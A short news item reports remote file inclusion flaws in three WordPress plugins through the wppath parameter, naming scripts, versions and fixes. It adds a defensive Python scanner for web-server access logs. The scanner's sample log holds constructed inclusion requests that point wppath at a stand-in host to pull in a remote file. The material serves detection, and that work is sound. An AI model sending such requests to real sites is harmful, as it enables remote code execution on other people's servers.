Plugins pose danger to WordPress blog security
Three plugins for the popular blogging software WordPress pose a danger to system security. Security vulnerabilities in myFlash, wordTube and wp-Table allow an attacker to include their own PHP scripts and execute them with the web server's privileges. All three plugins were written by the same developer.
The bug is due to incorrect processing of the wppath parameter in the wordtube-button.php, js/wptable-button.php and myflash-button.php modules used by the plugins. wordTube versions 1.4.3 and earlier, wp-Table versions 1.4.3 and earlier and myFlash versions 1.10 and earlier are affected. The bugs are fixed in wordTube 1.4.4, wp-Table 1.4.4 and myFlash 1.11. Users should update or uninstall the plugins as soon as possible.
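A log check for the pattern described above, as an added example that is not part of the original article or the plugins' code: it flags requests to the three affected scripts that carry a wppath parameter and marks those whose value starts with a URL scheme. The access-log format, plugin directory paths and sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script and parameter names come from the article; the rest is assumed.
SCRIPTS = {"wordtube-button.php", "wptable-button.php", "myflash-button.php"}
PARAM = "wppath"

# Common/combined log format: client ... "METHOD target HTTP/x" status
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# A value that starts with a URL scheme (http:, ftp:, php:, data:, ...)
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]+:", re.I)

# Constructed sample lines (documentation addresses, hypothetical paths).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http%3A%2F%2Fhost.example%2Fa.txt%3F HTTP/1.1" 200 512
192.0.2.11 - - [01/Jan/2024:10:00:05 +0000] "GET /wp-content/plugins/wp-table/js/wptable-button.php?wppath=/var/www/blog/ HTTP/1.1" 200 900
192.0.2.12 - - [01/Jan/2024:10:00:09 +0000] "GET /wp-content/plugins/myflash/myflash-button.php HTTP/1.1" 200 300
192.0.2.13 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?wppath=http://host.example/a.txt HTTP/1.1" 404 0
"""

def classify(line):
    """Return (client, script, status, verdict) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target, status = m.groups()
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in SCRIPTS:
        return None
    # parse_qsl percent-decodes values; match the parameter name
    # case-insensitively because it is seen as both wppath and wpPATH.
    values = [v for k, v in parse_qsl(parts.query, keep_blank_values=True)
              if k.lower() == PARAM]
    if not values:
        return None
    # "remote": value is a URL; "local": parameter supplied, still worth review.
    verdict = "remote" if any(SCHEME_RE.match(v) for v in values) else "local"
    return client, script, int(status), verdict

def scan(lines):
    """Classify every line and keep only the hits."""
    return [hit for hit in map(classify, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(*hit)
```

Parameters sent in a POST body do not appear in access logs, so this check only covers query strings.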
- wordpress plugins wp-Table <= 1.43 (inc_dir) Remote File Inclusion Vulnerability, advisory from M.Hasran Addahroni
- wordpress plugins wordTube <= 1.43 (wpPATH) Remote File Inclusion Vulnerability, advisory from M.Hasran Addahroni